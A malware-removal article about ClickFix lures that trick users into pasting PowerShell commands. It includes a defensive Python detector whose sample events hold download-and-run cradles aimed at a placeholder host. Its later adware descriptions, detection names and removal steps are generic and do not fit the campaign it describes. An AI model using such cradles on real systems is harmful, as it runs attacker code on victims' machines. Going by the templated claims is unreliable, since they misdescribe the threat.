ClickFix Malware is a deceptive and harmful program designed to infiltrate computers, disrupt their normal operation, and potentially steal sensitive information. As part of a broader category of malicious programs, ClickFix Malware poses significant risks to both individual users and organizations. Understanding its behavior, recognizing its symptoms, and knowing how to remove it effectively are crucial for maintaining cybersecurity.
Actions and Consequences of ClickFix Malware
Cyber threat actors have escalated their tactics by employing JavaScript embedded in HTML attachments and compromising legitimate websites. These methods now include overlays that mimic error messages from widely used applications such as Google Chrome, Microsoft Word, and OneDrive. These deceptive alerts coerce users into clicking on a button to copy a PowerShell command purportedly to fix the displayed issue. Users are then instructed to paste and execute this command in either a Run dialog or a PowerShell prompt.
While these attacks heavily rely on user interaction, their social engineering tactics are sophisticated enough to create a sense of urgency and legitimacy. This can prompt users to act hastily without fully assessing the potential risks involved. Security researchers have identified several malicious payloads used in these attacks, including DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard hijacker, and the Lumma Stealer.
The fraudulent scripts employed in these attacks are designed to deliver malware directly onto users’ devices. Analysts have identified three distinct attack vectors characterized by their initial stages, with the first not definitively linked to a specific threat actor group.
In the first scenario, attributed to threat actors associated with ClearFake, compromised websites load malicious scripts hosted via Binance’s Smart Chain contracts. These scripts trigger fake Google Chrome alerts claiming issues with web page display, prompting users to install a ‘root certificate’ by executing a PowerShell script in a Windows PowerShell (Admin) console. Upon execution, this script validates the target device, clears clipboard contents, and initiates the download of a remote PowerShell script that conducts anti-VM checks before deploying an information-stealing payload.
Another attack vector, part of the ‘ClickFix’ campaign, involves injecting code into compromised websites to display an overlay simulating a Google Chrome error. Users are directed to open ‘Windows PowerShell (Admin)’ and paste provided code, resulting in infections similar to those described previously.
Additionally, attackers utilize email-based methods featuring HTML attachments masquerading as Microsoft Word documents. These attachments prompt users to install a ‘Word Online’ extension for proper document viewing. Error messages within these documents offer ‘How to fix’ and ‘Auto-fix’ options. Choosing ‘How to fix’ copies a base64-encoded PowerShell command to the clipboard, instructing users to execute it in PowerShell. ‘Auto-fix’ uses the search-ms protocol to display a WebDAV-hosted ‘fix.msi’ or ‘fix.vbs’ file from an attacker-controlled file share. These PowerShell commands download and execute either an MSI file or a VBS script, leading to infections by Matanbuchus or DarkGate, respectively.
Throughout these scenarios, threat actors exploit users’ unfamiliarity with the risks associated with executing PowerShell commands and capitalize on Windows’ limitations in detecting and preventing these actions.
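As an added, illustrative detection example (not code from the original article): a scoring pass over constructed Sysmon-style process-creation records that flags PowerShell launched from the Run dialog or a browser with the hidden-window, policy-bypass, encoded-command and download-cradle traits these lures rely on. The parent-process list, the regular expressions, the threshold and the sample events are assumptions made for this example.

```python
import base64
import re
# Heuristics for a ClickFix-style run: powershell.exe launched from the Run dialog (explorer.exe) or
# a browser with a hidden window, policy bypass, base64 -EncodedCommand (UTF-16LE) or download cradle.
USER_LAUNCHERS = ("explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe")
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
FLAG_RES = {
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "policy_bypass": re.compile(r"(?i)-e(?:p|xec(?:utionpolicy)?)\s+bypass"),
    "download_cradle": re.compile(r"(?i)\b(?:iex|invoke-expression|irm|invoke-restmethod|"
                                  r"iwr|invoke-webrequest|downloadstring|net\.webclient)\b"),
}

def decode_encoded_command(cmdline):
    m = ENCODED_RE.search(cmdline)  # -EncodedCommand carries base64 of UTF-16LE script text
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le") if m else ""
    except (ValueError, UnicodeDecodeError):
        return ""

def score_event(event):
    """Return (score, reasons) for one Sysmon Event ID 1 style process-creation record."""
    reasons = []
    if not event["Image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, reasons
    parent = event["ParentImage"].lower().rsplit("\\", 1)[-1]
    if parent in USER_LAUNCHERS:
        reasons.append("spawned_by_" + parent)
    decoded = decode_encoded_command(event["CommandLine"])
    if decoded:
        reasons.append("encoded_command")
    for name, rx in FLAG_RES.items():
        if rx.search(event["CommandLine"]) or rx.search(decoded):
            reasons.append(name)
    return len(reasons), reasons

def find_clickfix_candidates(events, threshold=2):
    return [(ev["CommandLine"], r) for ev in events for s, r in [score_event(ev)] if s >= threshold]

# Constructed sample events, not from the article; example.invalid is a placeholder host.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://fix.example.invalid/a.ps1')"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode()
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": "powershell -w hidden -ep bypass -e " + _ENCODED},
    {"ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "Image": _PS,
     "CommandLine": 'powershell.exe -NoProfile -Command "irm http://fix.example.invalid/fix.ps1 | iex"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": _PS,
     "CommandLine": "powershell.exe -NoProfile Get-ChildItem C:\\Temp"},
]
```

The first two constructed events score 5 and 2 and are returned as candidates; the third, a plain administrative command started from cmd.exe, scores 0.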
The diverse attack strategies observed by researchers highlight the proactive efforts of threat actor group TA571 to enhance their effectiveness and discover new avenues for infecting more systems. This adaptive approach underscores their commitment to evolving tactics and expanding their impact within the cybersecurity landscape.
ClickFix Malware can perform a range of malicious activities once it infiltrates a system:
- Adware and Pop-ups: One of the primary actions of ClickFix Malware is displaying intrusive advertisements and pop-ups. These ads can lead to malicious websites that might further infect the system.
- Browser Hijacking: It can change browser settings, redirect search queries to unwanted websites, and alter the homepage without user consent.
- System Slowdown: The malware consumes system resources, leading to significant slowdowns and decreased performance.
- Data Theft: In more severe cases, ClickFix Malware can capture sensitive information, such as login credentials, credit card numbers, and personal data.
- Unauthorized Access: The malware might open backdoors for other malicious entities to access the infected system.
The consequences of these actions include compromised privacy, financial loss, and the risk of further infections.
Detection Names for ClickFix Malware
Different antivirus and cybersecurity tools may identify ClickFix Malware under various names, including:
- Adware.ClickFix
- Trojan.ClickFix
- PUA.ClickFix
- BrowserModifier:Win32/ClickFix
These detection names reflect the diverse nature of the malware and its potential impact on infected systems.
Similar Threats
ClickFix Malware shares similarities with other types of malware, including:
- Adware.Elex: Similar in its adware capabilities, causing unwanted advertisements and pop-ups.
- BrowserModifier:Win32/SupTab: Known for browser hijacking and redirecting search queries.
- Trojan.Win32.Generic: A general category for trojans that perform various malicious activities, including data theft and unauthorized access.
- PUA.Win32.Conduit: Potentially Unwanted Applications (PUAs) that change browser settings and slow down the system.
Removal Guide for ClickFix Malware
Step 1: Identify the Malware
- Check for Unusual Activity: Look for signs like unexpected ads, browser redirects, and system slowdowns.
- Use Windows Task Manager: Press Ctrl + Shift + Esc to open Task Manager and look for unfamiliar processes.
- Inspect Installed Programs: Go to Control Panel > Programs and Features to identify and remove suspicious applications.
Step 2: Boot in Safe Mode
- Restart the Computer: Press F8 repeatedly before Windows loads to access Advanced Boot Options.
- Select Safe Mode: Choose Safe Mode with Networking to minimize the number of active processes and make malware removal easier.
Step 3: Remove Malware Files
- Delete Temporary Files: Use the Disk Cleanup tool to remove temporary files that might harbor malware remnants.
- Manually Delete Suspicious Files:
  - Navigate to C:\Program Files and C:\Program Files (x86) to delete folders related to the malware.
  - Check C:\Users\[Your Username]\AppData\Local and C:\Users\[Your Username]\AppData\Roaming for suspicious files and folders.
Step 4: Restore Browser Settings
- Reset Browser Settings: Go to the settings menu of your browser and find the option to reset settings to default.
- Remove Unwanted Extensions: Check the extensions/add-ons manager of your browser and remove unfamiliar entries.
Step 5: Update and Scan with Windows Defender
- Update Windows Defender: Ensure your Windows Defender is up to date.
- Run a Full Scan: Open Windows Defender and perform a full system scan to detect and remove any remaining malware traces.
Step 6: Clean the Registry
- Open Registry Editor: Press Win + R, type regedit, and press Enter.
- Back Up the Registry: Before making changes, back up the registry.
- Delete Malware Entries: Navigate to HKEY_CURRENT_USER\Software, HKEY_LOCAL_MACHINE\SOFTWARE, and HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node to delete entries related to the malware.
Step 7: Perform a Final Check
- Monitor System Performance: Ensure there are no unusual activities or performance issues.
- Check Network Activity: Use tools like Resource Monitor to check for abnormal network activity.
Best Practices for Preventing Future Infections
- Regular Software Updates: Keep your operating system, browsers, and all software up to date to protect against vulnerabilities.
- Use Strong Passwords: Implement complex passwords and change them regularly.
- Avoid Suspicious Links: Do not click on unknown links or download attachments from untrusted sources.
- Enable Firewall: Ensure your firewall is active to block unauthorized access.
- Educate Yourself: Stay informed about the latest cyber threats and security practices.
By following this comprehensive guide, users can effectively remove ClickFix Malware from their systems and take steps to prevent future infections, ensuring their digital environments remain secure and efficient.